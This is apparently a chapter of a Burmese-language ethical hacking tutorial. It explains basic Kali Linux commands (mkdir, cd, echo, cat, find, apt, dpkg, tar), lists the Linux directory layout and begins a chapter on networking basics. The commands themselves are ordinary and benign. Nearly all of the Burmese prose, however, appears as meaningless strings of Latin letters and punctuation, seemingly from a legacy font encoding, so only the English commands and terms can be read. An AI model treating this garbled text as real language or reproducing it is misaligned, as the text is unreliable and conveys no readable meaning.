line awGrSm toHk;jyK&r,fh linux file awGrSm space rjcm;bJ emrnfay;xm;jcif;yg/
 uRefawmfu mkdir test-three qdkjyD; txufyg yHktwdkif; aemufwpfck
zefwD;Munfhygw,f/

txufyg yHktwdkif; test-three folder wpfckyJ xyfwdk;vmwmudk

awGY&ygr,f/ vdkcsifwmu space jcm;wJhemrnfeJY folder / 'gqdk b,fvdkvkyfrvJ/
linux command rSm space ygcsifwJhtcg "...." (rsufawmiftzGifhtydwf) Mum;rSm
xnfhoHk;&ygw,f/

txufygyHku twdkif; mkdir "test four" qdkjyD; space ygwJh

folder(directory) name udk rsufawmiftzGifhtydwfMum;rSm xnfo h Gif;vdkufwJhtcg
uRefawmfwdkY vdkcsifwJh space jcm;xm;wJh folder name eJY folder wpfckudk &&SdjyD
jzpfygw,f/

'gqdk&if cd eJY 0ifa&mufwJhtcgrSmvnf; " " xnfhzdkY vdkw,fqdkwm

oabmaygufr,fxifygw,f/
 ckqdk&ifawmh uRefawmfwdkY test four qdkwJh directory xJrSm &SdaeygjyD/
'Dcgawmh back jyefxGufyHkuav;udk aqG;aEG;ygr,f/

txufyg yHktwdkif; cd aemufrSm 2 dot (..) xnfhoGif;jyD; enter r,fqdk&if

folder wpfqifh aemufjyefxGufygw,f/ tm;vHk;jyefxGufcsif&ifawmh cd yJ
&dkufxnfhjyD; enter &rSmjzpfygw,f/

'Dcgawmh terminal topfwpfckzGifhjyD; dir wpfckcsif;pDudk

jyef0ifMunfh&atmifyg/

txufyg yHkonf terminal zGifhjyD;uwnf;u dir wpfckcsif;pDudk Munfh&I

0ifa&mufyHk jzpfygw,f/ dir awGudkom od&if yHkygtwdkif; command
taMumif;a&rsm;rsm;eJY wpfqifhpD 0ifaep&mrvdkbJ wdkuf&dkuf
0ifa&mufEdkifygao;w,f/

txufyg yHkwGifMunfhvsif cd command udkoHk;jyD; wpfqifhpD

0ifa&mufjcif; ESifh cd command jzifh wdkuf&dkuf0ifa&mufjcif; wdkY&JU uGmjcm;rIudk
awGYjrifEdkifygw,f/
'Dcgawmh pm&dkufwJhtydkif;udk quf&atmifyg/ terminal awG
&Iyfrae&atmif cke zGihfxm;wmawGudk ydwfvdkufjyD; topfjyefzGifhvdkuf&atmif/
jyD;&if Desktop ay:u test qdkwJh folder xJ 0ifxm;vdkufyg/ 'Dae&mrSm
enf;enf;av; ajymvdkwmu uRefawmfwdkY oHk;r,fh Kali Linux rSm Pop-up (GUI)
taeeJY toHk;jyKEdkifwJh pm&dkufEdkifwJh app awG&Sdovdk command line rSm
oHk;&wmawGvnf; &Sdygw,f/ command line uae vkyfaqmif&wmudkawmh ydkjyD;
avhvmxm;zdkY vdktyfygw,f/ bmaMumifhvJqdkawmh uRefawfmwdkYu Hacking
avhvmaewmrdkYygyJ/
pm&dkufEdkifwJh program awG &Sdw,fvdkY ajymcJhjyD;jyDaemf/ leafpad, gedit,
vim pwmawGudk oHk;avh&SdMuygw,f/ leafpad eJY gedit uawmh
toGiftjyifuvGJ&if oabmw&m;csif; wlygw,f/ cke command line xJrSm
prf;oyfMunfhvdkuf&atmifaemf/ test.txt qdkwJhzdkifwpfckudk leafpad (or) gedit
wpfckckeJY zefwD;vdkufyg/

leafpad test.txt vdkY&dkufvdkufwJhtcg leafpad eJY zdkifwpfck yGifhvmrSmjzpfjyD;

tJonfxJrSm rdrdwdkY tvdk&Sd&m pmudk &dkufEdkifygw,f/ jyD;&if save jyD; ydwf vdkufyg/
ckae ls eJY jyefazmfMunfhr,fqdk&ifawmh uRefawmfwdkY zefwD;xm;wJh test.txt
qdkwJhzdkifav;udk awGY&ygvdrfhr,f/

Desktop ay:u test folder xJrSm zGifhMunfh&ifvnf;

 txufygyHktwdkif; test.txt qdkwmudk awGY&ygr,f/ gedit vnf; leafpad
vdkygyJ/ leafpad ae&mrSm gedit eJY ajymif;prf;Munfhaygh/
'Dcgawmh command line uaeyJ pm&dkufjyD; zdkifzefwD;&atmif/

txufyg yHkrSmMunfh&if echo udk toHk;jyKjyD; pm&dkufcJhwmudk awGY&ygr,f/

rdrd a&;vdk&mpmudk rsufawmiftzGifhtydwf Mum;rSm xm;jyD; oHk;&rSmjzpfovdk >
oauFw&JU aemufrSm rdrd vdktyfwJh zdkifemrnfudk xnfhoGif;&rSmjzpfygw,f/
'gqdk&ifawmh ls eJY jyefazmfMunfh&if test2.txt qdkwJh zdkifaemufwpfck
xyfwdk;aewmudk jrif&rSmyg/

folder rSm oGm;zGifhMunfh&ifvnf; txufygtwdkif; jrif&rSmyg/ test2.txt

udk zGifhMunfhygu cke uRefawfmwdkY &dkufcJhwJh This is my testing. qdkwmudk
awGY&ygvdrfhr,f/ command line udk jyefoGm;&atmif/

txufyg yHkrSmMunfh&if cat command udk toHk;jyKjyD;awmh &dkufcJhwJh

pmawGudk jyefazmfMunfhEdkifwm awGY&ygr,f/ olYudk toHk;jyKyHkuawmh cat file-name
yHkpH jzpfygw,f/

ckqdk terminal uae txt zdkif zefwD;jyD; pm&dkufwm/ pmudk

jyefxkwfMunfhwm pwmawG aqG;aEG;jyD;jyDjzpfygw,f/ 'Dcgawmh cke test2.txt
zdkifxJudk aemufxyf pmaMumif;wpfck xyfwdk;Munfh&atmif/

cke command line xJrSmyJ echo "I am learning Ethical Hacking." >
test2.txt
vdkY &dkufxnfhvdkufwmyg/ oabmu test2.txt zdkifudk txJu
pmom;ae&mrSm I am learning Ethical hacking vdkY jyifr,faygh/

txufygyHkrSmMunfh&if olY&JU rlvpmom; This is my testing. ae&mrSm I

am learning Ethical hacking. qdkwmu tpm;xdk;0ifa&mufvmwmudk awGY&rSmyg/
pmawGudk jyifwmr[kwfbJ xyfjznfh&HkyJqdk&ifawmh > ae&mrSm >> ESpfckxyf oHk;&rSm
jzpfygw,f/

txufyg yHkrSmMunfh&if rlvpmaMumif;xJrSm Ethical Hacker

qdkwJhpmom;udk xyfjznfhr,f vdkY qdkvdkygw,f/ >> udk toHk;jyKxm;wJhtwGuf
xyfjznfhr,fqdkwmudk od&SdEdkifygw,f/

txufyg yHkrSmMunfh&if cat eJY jyefazmfMunfhvdkufwJhtcg pmaMumif;awG

xyfwdk;vmwmudk awGYjrif&rSmyg/ 'Davmufqdk em;vnfjyDvdkY ,lqygw,f/ ck
zdkif&Smwmav; qufaqG;aEG;&atmif/ zGifhxm;wJh terminal udk ydwfjyD;topf jyefzGifh
vdkufyg/ jyD;&if find command udk toHk;jyKjyD; &SmazGenf; prf;Munfh&atmif/ olYudk
toHk;jyKyHkuawmh find &Smvdkonfhae&m -name &Smrnfhzdkiftrnf jzpfygw,f/ ydkjyD;
em;vnfatmif ajymjy&&if Oyrm- uRefawmfwdkYu Desktop ay:rSm cke
prf;oyfzefwD;xm;wJh folder xJrSm test2.txt qdkwJhzdkifav;udk
&SmMunfhr,fqdkygawmh/ &SmwJh command u find, &SmcsifwJhae&mu Desktop,
zdkifemrnf jzpfaMumif; -name,&SmvdkwJh zdkifemrnfu test2.txt qdkawmh &SmwJhtcg
oHk;&r,fh command u find Desktop -name test2.txt aygh/

&SmMunfhvdkufwJhtcgrSmawmh txufyg yHktwdkif;yJ Desktop ay:u test

qdkwJh folder xJrSm test2.txt qdkwJhzdkif &SdaMumif; jyvmygawmhw,f/ 'gu
uRefawmfwdkYtaeeJY test2.txt zdkifonf Desktop ay:rSm &Sdw,fvdkY odxm;vdkY &SmvdkY
&wm/ tu,fí b,fae&mrSmrSef; rodbl;qdkygpdkY/ 'gqdk&ifawmh
uRefawmfwdkYtaeeJY system wpfckvHk;xJrSm &Sm&ygawmhr,f/ system &JY oauFwu
/ jzpfygw,f/ root system "/" yg/ 'gaMumifh &SmazGwJhtcg &SmcsifwJhae&m udk ^ yJ
xm;vdkuf&rSmyg/

txufygyHkudk Munfhr,fqdk&if uRefawmfwdkYtaeeJY test2.txt zdkifudk

system wpfckvHk;rSm &Smvdkufw,f/ /root/Desktop/test/test2.txt vdkY jywJhtwGuf
Desktop ay:u test qdkwJh directory xJrSm&Sdw,fqdkwmudk odEdkifjyD jzpfygw,f/
'Dae&mrSm xyfrHjznfhpGuf ajymvdkwmu Linux system onf Case Sensitive
jzpfw,fvdkY qdkcJhw,faemf/ pmvHk; tBuD;tao; vGJ&ifvnf; &Smwm
awGYrSmr[kwfygbl;/ tJonfawmh uRefawmfwdkY &Smr,fh zdkifu T tBuD;vm;?
tao;vm; *&kpdkuf a&;&ygr,f/ tBuD;vm; tao;vm; rod&ifawmh
zdkifemrnfae&mrSm [Tt]est2.txt qdkjyD; tppmvHk; tBuD;jzpfjzpf tao;jzpfjzpf
jyygvdkY qdkvdkufjcif; jzpfygw,f/

zdkifemrnfrSm test ygwmawmhodw,f/ tm;vHk;vnf; aocsmrodbl;

qdk&ifawmh 'Dvdk&SmMunfhEdkifygw,f/

oluawmh zdkifemrnfrSm test ygorSs zdkifwdkif;udk xkwfjyrSmjzpfvdkY zdkifawG

trsm;BuD; &SmawGYygvdrfhr,f/ 'Davmufqdk &SmazGwJhtydkif;vnf; &avmufjyDvdkY ,lq
ygw,f/ 'Dcgawmh tjcm; toHk;rsm;wmav;awGudk acgif;pOf tao;av;awG
xyfcGJjyD; aqG;aEG;oGm;&atmif/ ydk rSwfrdatmifaygh/

APT Package Handling Utility

APT Package Handling Utility udkawmh apt-get vdkY tvG,fqHk;
odMuygw,f/ package awGudk install vkyf&mrSma&m remove vkyf&mrSma&m?
upgrade jyKvkyf&mrSma&m odyfvG,fuljyD; aumif;rGefwJh tool wpfckvdkY qdk&ygr,f/
uRefawmfwdkYoHk;r,fh Kali Linux rSm uRefawmfwdkY oHk;aewJh Android ay:u
PlayStore vdkrsdK;aygh? application awGudk &,lEdkifr,fh source wpfck &Sdygw,f/
tJonf source eJY uRefawmfwdkY&JU uGefysLwmeJY csdwfqufjyD;jyDqdk&ifawmh apt-get
uae software package awGudk tvG,fwul oGif;,l &&SdEdkifjyDjzpfygw,f/ apt-get
uae software awGudk oGif;,ljcif;rSm tm;omcsufawG &Sdygw,f/ bmawGvJqdk&if
package wpfck install jyKvkyfzdkY&mtwGuf vdktyfwJh dependency awG (em;vnf
vG,fatmif ajym&&if aemufxyf qufpyfaewJh vdktyfcsufawG qdkygawmh/) udkyg
xnfhoGif;ay;ygw,f/ 'gaMumifh wpfckcsif;pD vdkuf&Smjznhf&wmrsdK; vkyfp&m
rvdkawmhbl;aygh/
ydk&Sif;atmif Oyrmay;&&if Pen-tester awG? Hacker aw rvGwfwrf;
toHk;jyKavh&SdwJh Metasploit vdk program [m RUBY vdkYac:wJh Programming
Language ay:rSDwnfaeygw,f/ RUBY udk install jyKvkyfxm;jcif;r&SdbJ
Metasploit udk run vdkY r&Edkifygbl;/ 'gaMumifh RUBY onf Metasploit &JU
dependency jzpfygw,f/ (Metasploit u uRefawmfwdkY toHk;jyKr,fh Kali Linux rSm
yg0ifjyD;om;jzpfwmrdkY RUBY yg yg0ifjyD;om;jzpfw,fqdkwmawmh ajymp&m
rvdkawmhbl;ayghaemf)/ 'Dawmh jyefjcHKajym&&if apt-get uae app awGudk install
vkyfr,fqdk&if olwdkY&JU dependency awGudkyg wpfygwnf; automatic install
vkyfay;oGm;ygw,f/ Oyrm- apt-get install virtualbox qdkygawmh/ virtualbox eJY
wGJzuf oHk;&r,fh app awGudkyg xnfhoGif;ay;xm;ygw,f/
tJonfvdk vkyfaqmifEdkifzdkYtwGufawmh /etc/apt/ xJu sources.list
zdkifudk leafpad (or) gedit eJY zGifhjyD; sources.list xnfhoGif;Edkifygw,f/ sources.list
u rdrdwdkY install xm;wJh Kali Linux Version ay: rlwnfjyD; uGmjcm;EdkifwmrdkY
'Dae&mrSm razmfjyawmhygbl;/ www.khitminnyo.com rSm azmfjyay;xm;ygw,f/
apt-get install (package) u package wdkif;twGuf &Edkifwmawmh r[kwfygbl;/
rdrdwdkY xnfhoGif;xm;wJh source rSm &EdkifwJh package awGudkom &&SdEdkifrSmjzpfjyD;
tjcm;aom package awGudkawmh oufqdkif&m source awGuae
a'gif;,l&&SdEdkifygw,f/ Kali Linux onf Debian Based jzpfwmrdkY olYtwGuf
package awGonf debian package (dpkg) jzpfygw,f/ Ubuntu onfvnf;
Debian Based jzpfwmrdkY Ubuntu eJY Kali rSm Debian package (dpkg) awGudk
wlnDpGmm toHk;jyKEdkifygw,f/ dpkg awG&JU file extension uawmh .deb jzpfygw,f/
Oyrm- example.deb aygh/
deb zdkifawGudk install zdkYtwGufawmh dpkg -i udk toHk;jyKygw,f/
Debian Package awGudk install vkyfr,fvdkY qdkvdkwmaygh/ Terminal uae .deb zdkif
xm;&SdwJh ae&mudk 0ifa&mufvdkufyg/ jyD;&if dpkg udkoHk;jyD; install EdkifygjyD/ Oyrm
Download qGJxm;wJh example.deb udk install r,f qdkygawmh/ Downloads
directory xJudk cd command eJY 0ifa&mufjyD; dpkg -i pkg-name.deb eJY install
Edkifygw,f/
 ckwpfcgawmh apt-get command udktoHk;jyKjyD; package awGudk install
vkyfMunfh&atmif/ toHk;jyK&r,fh command u apt-get install pkg-name
jzpfygw,f/ 'gqdk&if Photoshop vdk "mwfyHkjyifwJh free software wpfckudk install
vkyfMunfh&atmif/ olY&JU pkg-name u gimp jzpfwmaMumifh gimp udk install &r,fh
command onf apt-get install gimp jzpfygw,f/ xdkYtwlygyJ/ Virtual Box udk
install vdkygu apt-get install virtualbox vdkY &dkufxnfh&rSmjzpfygw,f/

Update
apt-get onf app & dependency awGudk install ay;Edkif&Hkomru install
xm;wJh package awGtwGuf update &&SdEdkifrI tajctaeudkyg azmfjyay;Edkifovdk
update vnf; jyKvkyfay;Edkifygao;w,f/ sources list xnfhoGif;jyD;onfhtcg jzpfap?
source wpfckck ajymif;vJonfhtcgjzpfap? jznfhoGif;vdkufwJh source topfudk
uRefawmfwdkY&JU pepfeJY csdwfqufEdkifzdkYtwGuf apt-get update command udk
toHk;jyK&ygw,f/ xdkYtwlygyJ/ uRefawmfwdkY&JU pepfxJrSm&SdwJh package awGtwGuf
upgrade &&SdEdkifrItwGufvnf; apt-get update eJY ppfaq;Edkifygao;w,f/
(rSwfcsuf/ / apt-get tpm; apt udkyJ toHk;jyKEdkifygw,f/Oyrm apt update,
apt install gimp, ...)

Upgrade
rnfonfh pepfrQ tNrJwrf; jyD;jynfhpHkraeyg/ t"du Operating System
udk wdk;wufatmif jyKvkyfwm? oHk;&ydkrdkvG,fulatmif zefwD;wm?
wdk;wufaumif;rGefatmifvkyfwm? patch management awG? new feature awG
xnfhoGif;wm? bugs awGudk rSefaumifatmif jyKjyifwm pwmawGtwGuf tpOftjrJ
development state rSm &Sdaeygw,f/
uRefawmfwdkY&JU Kali Linux rSm xnfhoGif;toHk;jyKxm;wJh package
awGtwGuf new version awG&&SdwJhtcg upgrade jyKvkyfEdkifr,fh command
udkvnf; apt-get (or) apt eJY toHk;jyK&ygw,f/ upgrade jyKvkyfp&m&SdaewJhtcg
(qdkvdkwmu application wpfck Am;&Sif;topf xGufwJhtcg) apt-get update (or)
apt update vkyfMunfh&if 'Dvdk ay:ygr,f/
 txufyg yHkxJutwdkif; twdtusawmh ay:rSmr[kwfyg/ rdrdwdkY pwif
toHk;jyKwJhtcsdefeJY package awG uGmjcm;Edkifygw,f/ ck yHkrSmMunfh&if 399 packages
can be upgraded. Run 'apt list --upgradable' to see them. qdkjyD; awGY&ygvdrfhr,f/
upgrade jyKvkyfEdkifwJh package aygif; 399 ck &Sdw,fqdkwJhtaMumif;
azmfjyxm;ovdk apt list --upgradable udk toHk;jyKjyD; upgrade jyKvkyfEdkifr,fh list udk
MunfhEdkifwJhtaMumif; azmfjyay;xm;wmyg/

txufygyHkuawmh upgradable awGudk azmfMunfhwJhtcg jrif&r,fhyHkjzpfjyD;

tenf;i,fudkom ,lxnfhxm;ygw,f/ yHkrSmMunfh&if a&SUqHk;rSm package name udk
azmfjyxm;wmudk awGYjrif&rSmyg/ rdrdwdkY uGefysLwmrSm vkdufvkyfMunfhr,fqdk&ifawmh
tpdrf;a&mifeJY azmfjyxm;ygvdrfhr,f/ 'gu package name jzpfjyD; ^ aemufuawmh
olYtwGuf tenf;i,f azmfjycsuf jzpfygw,f/ b,f version uae b,f version
xd jrSifhr,fqdkwmudkyg azmfjyay;xm;wmudk awGYEdkifygw,f/
txufyg yHkrSm Munfhr,fqdk&if yersinia, zsh, zsh-common qdkwJh
package awG upgrade &edkifr,fhxJrSm ygaewmudk awGY&rSmyg/ rdrdwdkY vdktyfwJh
package udkom a&G;cs,f upgrade vdkygu apt install udk toHk;jyKEdkifygw,f/ Oyrm
- zsh udk upgrade jyKvkyfvdkygu apt install zsh aygh/

apt-get install (or) apt install command udk toHk;jyKwJhtcg tcsdKUaom

package awGrSm install vkyf rvkyf twnfjyK&ygw,f/ tcsdKUtwGufawmh
rvdktyfygbl;/ Do you want to continue? [Y/n] qdkjyD; ar;avh&Sdygw,f/ y udk
tBuD;jzpfap tao;jzpfap &dkufxnfhjyD; enter Edkifygw,f/ Y/n rSm Y udk
tBuD;pmvHk;eJY azmfjyxm;wmu default u Y vdkY qdkvdkwmyg/ N udk tBuD;eJY
azmfjyxm;&ifawmh Default u N vdkY od&ygr,f/ ckyHkt&awmh install vkyfrSmrdkY Y
udk ajz&ygr,f/ xdkodkY Y/n ar;aomtqifhudk ausmfvdkygu toHk;jyKr,fh command
&JU aemufrSm -y vdkY xnfhay;vdkuf&HkygyJ/ Oyrm gimp udk Y/n rajz&bJ install
vdkygu apt install gimp -y (odkYr[kwf) apt-get install gimp -y qdkjyD; command
&dkuf&rSm jzpfygw,f/ install progress 100% jynfhjyD; command line
aemufwpfaMumif; ay:ygu install jyD;qHk;jyDjzpfygw,f/

a&SUrSm aqG;aEG;cJhwJh upgrade &&SdEdkifwJh package awGtm;vHk;udk upgrade

vkyfvdkygu txufyg yHkxJutwdkif; apt upgrade -y udk toHk;jyKEdkifygw,f/ -y
uawmh Y/n ar;&if y ajzr,fqdkwm BudKwifajymjcif;jzpfaMumif; xyf&Sif;jyp&m
rvdkawmhbl;xifygw,faemf/

Distribution Upgrade
'Dtydkif;uawmh apt upgrade wdkYvdk rMumcP &&SdEdkifwmawmh
r[kwfygbl;/ Kernel Version jrifhoGm;wmrsdK;? 'grSr[kwf system version topf
xyf&wmrsdK; (Oyrm- Android Version 5 uae 6, 7 xd jrSifhEdkifwmrsdK;) awGtwGuf
rSom vkyfaqmiftoHk;jyKEdkifrSmjzpfygw,f/ Oyrm - uRefawmfwdkYu Kali Linux
2016.2 udk Install jyKvkyfxm;w,f/ ck ('Dpma&;aewJhcsdefrSm) Kali Linux Version
u 2017.1 xd a&muf&SdoGm;ygjyD/ 'Dawmh uRefawmfwdkYtaeeJY topfjyefwif
&rSmvm;/ rvdkygbl;/ tJonf tajctaetwGuf uRefawmfwdkY toHk;jyKEdkifr,fh
command av;wpfck &Sdygw,f/ tJ'guawmh apt dist-upgrade (or) apt-get
dist-upgrade yJ jzpfygw,f/
ajymzdkY arhoGm;w,fAsm/ apt command (apt update, apt upgrade, apt
install, apt dist upgrade) awGudk toHk;jyKr,fqdk&if tifwmeufawmh
vdktyfygw,f/ tifwmeufvdkif; csdwfqufxm;rSom vkyfaqmifvdkY &ygr,fAs/

Removing Packages
install taMumif; odjyDqdkawmh uninstall udk qufaqG;aEG;ygr,f/ install
& remove yJ uGmjyD; vkyfaqmif&wmawmh wlnDygw,f/ Oyrm - gimp udk
jyefjzKwfcsif&if apt remove gimp (or) apt-get remove gimp qdkjyD;
toHk;jyKEdkifygw,f/ yHkeJYawmh vkyfrjyawmhbl;aemf/

Auto-removing
uRefawmfwdkY&JU Operating System xJu package (application) awGudk
upgrade jyKvkyfvdkufwJhtcg xdk package awG&JU old version awG[m rvdktyfbJ
usef&Sdaeygawmhw,f/ 'gawGudk z,f&Sm;ay;zdkY vdktyfygw,f/ upgrade (or)
dist-upgrade jyKvkyfjyD;wdkif; vkyfoifhw,f qdkygawmh/ ay;&r,fh command u
awmh apt autoremove jzpfygw,f/ autoremove udk cGJra&;ygbl;/

Purge
purge udkawmh linux user tcsdKUu rodMuovdk tcsdKUu
a&SmifMuygw,f/ remove eJY purge rwlnDygbl;/ bmuGmvJqdkawmh apt remove
pkg u package wpfckudkom uninstall vdkufwmjzpfjyD; configuration file awGudk
zsufroGm;ygbl;/ aemufwpfBudrf vdktyfwJhtcg jyefvnftoHk;jyKapEdkifzdkY
pufxJrSmyJ xm;xm;cJhygw,f/ purge uawmh configuration file awGudkyg tm;vHk;
zsufvdkufygw,f/ 'gqdk bmvdkY purge udk oHk;aeao;vJ vdkY ar;p&m
&Sdaumif;&Sdygr,f/
olYudk app wpfckudk vHk;0 reinstall jyefvnfjyKvkyfvdkwJhtcg oHk;ygw,f/
configuration file xJrSm rSm;,Gif;oGm;wm? jyifrdvdkufjyD; arhoGm;vdkY program
tvkyfrvkyfawmhwm pwJhtajctaersdK;twGufvnf; apt purge pkg-name udk
toHk;jyKygw,f/ Oyrm gimp udk tm;vHk;ukefpifatmif jzKwfjyD; jyefxnfhoHk;csif&if
apt purge gimp eJYjzKwfjyD; apt install gimp eJY jyefoGif;aygh/

Clean
uRefawmfwdkYawG apt install pkg eJY install jyKvkyfwJhjzpfpOfrSm package
awGudk oufqdkif&m sources uae download &,lygw,f/ jyD;wJhtcg unpackage
vkyfjyD; install w,faygh/ install jyD;oGm;wJhtcg rvdktyfawmhwJh package awG[m
uRefawmfwdkY&JU system xJrSm usefae&pfcJhygw,f/ tJovdkeJY rsm;jym;vmwJh
tcgrSmawmh HDD space awG avsmhenf;ukefygawmhw,f/ 'gaMumifh olwdkYudk
clean vkyfay;zdkY vdktyfjyD; tJonftwGuf apt clean (or) apt-get clean udk
toHk;jyKEdkifygw,f/

Auto clean
clean eJY vkyfaqmifyHkcsif; wlwJh autoclean udkawmh apt upgrade eJY apt
dist-upgrade awG vkyfjyD;wJhtcsdefawGrSm oHk;ygw,f/ app wpfck version opf
upgrade jyD;wJhtcg version ta[mif;udk &Sif;ay;w,fvdkY rSwfxm;Edkifygw,f/ olYudk
toHk;jyKyHkuawmh apt autoclean (or) apt-get autoclean jzpfygw,f/

Combining to the Commands

command awGudk aygif;pyfvdkwJhtcg && oauFwudk (ESpfckxyf) Mum;cH
oHk;ygw,f/ Oyrm apt update && apt upgrade && apt dist-upgrade aygh/
aemufwpfckxyfajym&&if apt autoremove && apt autoclean aygh/ wpfqufwnf;
oHk;EdkifwJh command awGudk aygif;pyf toHk;jyKwmyg/

Removing Debian Packages

Debian package (.deb) awGudk install wJhtcg dpkg -i pkg.deb eJY
install aMumif; aqG;aEG;cJhjyD;jyDaemf/ remove vkyfr,fqdk&if -i (install) ae&mrSm -r
(remove) eJY -p (purge) udk toHk;jyKEdkifygw,f/
dpkg -i example.deb
dpkg -r example.deb
dpkg -p example.deb

Tarballs
uRefawmfwdkY odMuwJh zip, rar wdkYvdk file archives vkyfwJh program
wpfckyg/ Tape Archives udk twdkaumufjyKjyD; TAR vdkY ac:qdkygw,f/ zdkifawG
trsm;BuD;udk pkpnf;EdkifwJhtwGuf zip wdkY rar wdkYvdkyJ tarball format udkvnf;
toHk;jyKMuygw,f/ Linux package awGrSm t"du toHk;jyKMuygw,f/

txufyg yHkxJutwdkif; Desktop ay:u a qdkwJh directory wpfckxJrSm

1.txt eJY 2.txt qdkwJh zdkif ESpfzdkifudk zefwD;vdkufygw,f/ (aqG;aEG;jyD;om;awGrdkY
&Sif;rjyawmhbl;aemf)

toHk;jyK&r,fh command u tar -cf name.tar.gz file1 file2 file3 qdkwJh

yHkpHrsdK; jzpfygw,f/ tar -cf u tar zdkifwpfck zefwD;r,fvdkY qdkvdkygw,f/ name.tar.gz
rSm emrnfu rdrdESpfouf&m ay;vdkY&ayr,fh no space jzpf&ygr,f/ .tar.gz eJY
qHk;&ygr,f/ file1,2,3,.. awGuvnf; rdrdwdkY xnfhoGif;vdkwJh zdkifawG jzpf&ygr,f/
vuf&Sd directory xJrSm &Sdae&ygr,f/ ckaerSm ls eJY list vkyfMunfhr,fqdk&ifawmh

uRefawmfwdkY zefwD;vdkufwJh test.tar.gz qdkwJh zdkifwpfck xyfwdk;vmwmudk

awGY&rSmyg/ 'guawmh wpfzdkifpD xnfhoGif;enf; jzpfjyD; folder (directory)
wpfckvHk;udk tar xJ xnfhvdkwJhtcg tar -cf name.tar.gz * udk oHk;Edkifygw,f/ * u
vuf&Sda&mufaewJh directory wpfckvHk;udk tar zdkifxJ xnfhoGif;r,fvdkY qdkvdkygw,f/

ckqdk&ifawmh uRefawmf zefwD;xm;wJh tar file ESpfck awGY&jyDjzpfygw,f/

tar file xJ ygwJh zdkifpm&if;udk list xkwfMunfhcsif&ifawmh tar -tf udk oHk;ygw,f/

cke zefwD;vdkufwJh test.tar.gz xJu zdkifawGudk list jyefazmfMunfhwmyg/

vuf&Sd terminal rSmyJ rm udk oHk;jyD; 1.txt eJY 2.txt qdkwJh zdkifawGudk
zsufvdkufygw,f/ ls eJYMunfhwJhtcg rawGYawmhygbl;/ cke tar awGudk
jyefjznf&atmif/

yHkrSmMunfhyg/ test.tar.gz udk jznfzdkYtwGGuf tar -xf udk toHk;jyK

jyxm;ygw,f/ ls azmfMunfhwJhtcg tar xJ xnfhxm;wJh zdkifESpfck jyefawGY&ygjyD/ file
list yg Munfh&if; jyefazmfcsif&ifawmh tar -xvf udk toHk;jyKEdkifygw,f/
 uRefawmf erlem oHk;jyoGm;wJh x,v,c,f wpfvHk;csif;pDudk odcsif&ifawmh
terminal rSm tar --help vdkY &dkufxnfhjyD; &SmEdkifygw,f/

tjcm;aom command awGudkyg help options ac:MunfhvdkY &ygw,f/

file size udkyg avSsmhcsvdkygu tar -cf tpm; tar -czf udk toHk;jyKEdkifygw,f/ 'D
CHAPTER av;u Linux taMumif; rdwfqufwmeJY Linux New user
awGtwGuf odoifhwJh general linux command av;awGudk azmfjyaqG;aEG;
ay;cJhwm jzpfygw,f/

Linux File System

uJ 'D Chapter uav;udk Linux File System taMumif;av;eJY
ed*Hk;csKyf&atmif/ zwf&vG,fwmrdkY &Sif;rjyawmhbl;aemf/
/bin/: basic programs
/boot/: Kali Linux kernel and other files required for its early boot process
/dev/: device files
/etc/: configuration files
/home/: user's personal files
/lib/: basic libraries
/media/*: mount points for removable devices (CD-ROM, USB keys, and so
on)
/mnt/: temporary mount point
/opt/: extra applications provided by third parties
/root/: administrator's (root's) personal files
/run/: volatile runtime data that does not persist across reboots (not yet
included in the FHS)
/sbin/: system programs
/srv/: data used by servers hosted on this system
/tmp/: temporary files (this directory is often emptied at boot)
/usr/: applications (this directory is further subdivided into bin, sbin, lib
according to the same logic as in the root directory) Furthermore, /usr/share/
contains architecture-independent data. The /usr/local/directory is meant to be
used by the administrator for installing applications manually without
overwriting files handled by the packaging system (dpkg).
/var/: variable data handled by daemons. This includes log files, queues,
spools, and caches.
/proc/ and /sys/ are specific to the Linux kernel (and not part of the FHS).
They are used by the kernel for exporting data to user space.
('D file system awGudkawmh Kali &JU Official Page uae ul;xm;ygw,f/)
CHAPTER 6: General Knowledge for Hacking

1. Basic Networking Concepts

'D title t& taMumif;t&mu odyfBuD;oGm;w,fvdkY xifaumif;

xifygr,f/ uRefawmfwdkY ck avhvmrSmu Hacking yg/ Networking udk avhvmrSm
r[kwfbl;vdkYvnf; awG;rdaumif; awG;rdygvdrfhr,f/ Hacking rSm networking &JU
oabmw&m;awGudk xnfhoGif;toHk;jyK&w,f qdkwm odjyD;om;vnf; jzpfaumif;
jzpfEdkifygw,f/ Networking eJY ywfoufjyD; avhvmzl;olawGtwGufawmh 'D title
rSm aqG;aEG;r,fh taMumif;t&mawGudk odjyD;aumif; odjyD; jzpfygvdrfhr,f/ odkYaomf
rodao;olawGtwGuf 'Dtydkif;udk xnfhoGif;vkduf&jcif; jzpfygw,f/ Networking
eJY ywfoufjyD; oD;oefY a&;om;azmfjyjcif; r[kwfvdkY Networking concepts
tm;vHk;awmh yg0ifrSmr[kwfygbl;/ rodrjzpf od&r,fh oabmw&m;
tusOf;csKyfawGudkom aqG;aEG;ay;oGm;rSmjzpfygw,f/
Networking qdkwm uGefysLwmawGeJY tjcm;aom acwfrD electronic
device awGMum; wpfckeJYwpfck qufoG,fMuwJh enf;vrf; jzpfygw,f/ Networking
[m &IyfaxG;wJh topic wpfckvdkY qdkEdkifygw,f/ 'Dae&mrSmawmh wwfEdkifoavmuf
wdkwdkeJY vdk&if;udk em;vnfvG,fatmif aqG;aEG;ay;oGm;ygr,f/
apmapmu ajymcJhovdkygyJ/ Networking qdkwmu uGefysLwmawG
tcsif;csif;Mum;? uGefysLwmawGeJY tjcm;aom modern electronic device
awGMum;rSm qufoG,fwJh enf;vrf; jzpfygw,f/ tJonf device awGMum;rSm
vrf;aMumif;awG tjzpf jrifa,mifMunfhr,fqdk&ifawmh Networking udk
uGefysLwmawGMum;u electronic road awGvdkY jrifMunfhEdkifygw,f/ tJonf
vrf;aMumif;awG[m CAT 5 or 6 cable awG? fiber optic cable awG vdkrsdK; physical
vnf; jzpfEdkifygw,f/ Wireless vdk non-physical vnf; jzpfaeEdkifygw,f/
tvG,fulqHk;ajym&&ifawmh wired networking eJY wireless networking aygh/
Wired & Wireless networking awGrSm tajccHtm;jzifh wlnDwJh
component awG &SdMuygw,f/ csdwfqufqufoG,f EdkifzdkYtwGuf uGefysLwm ESpfvHk;
odkYr[kwf ESpfvHk;xuf ydkwJh device awG vkdtyfygw,f/ xdkYtwl xdkodkY csdwfquf
qufoG,fr,fh device awG taeeJYuvnf; rSefuefwJh csdwfqufrIeJY rSefuefwJh
configuration jzpfzdkYvdktyfygw,f/
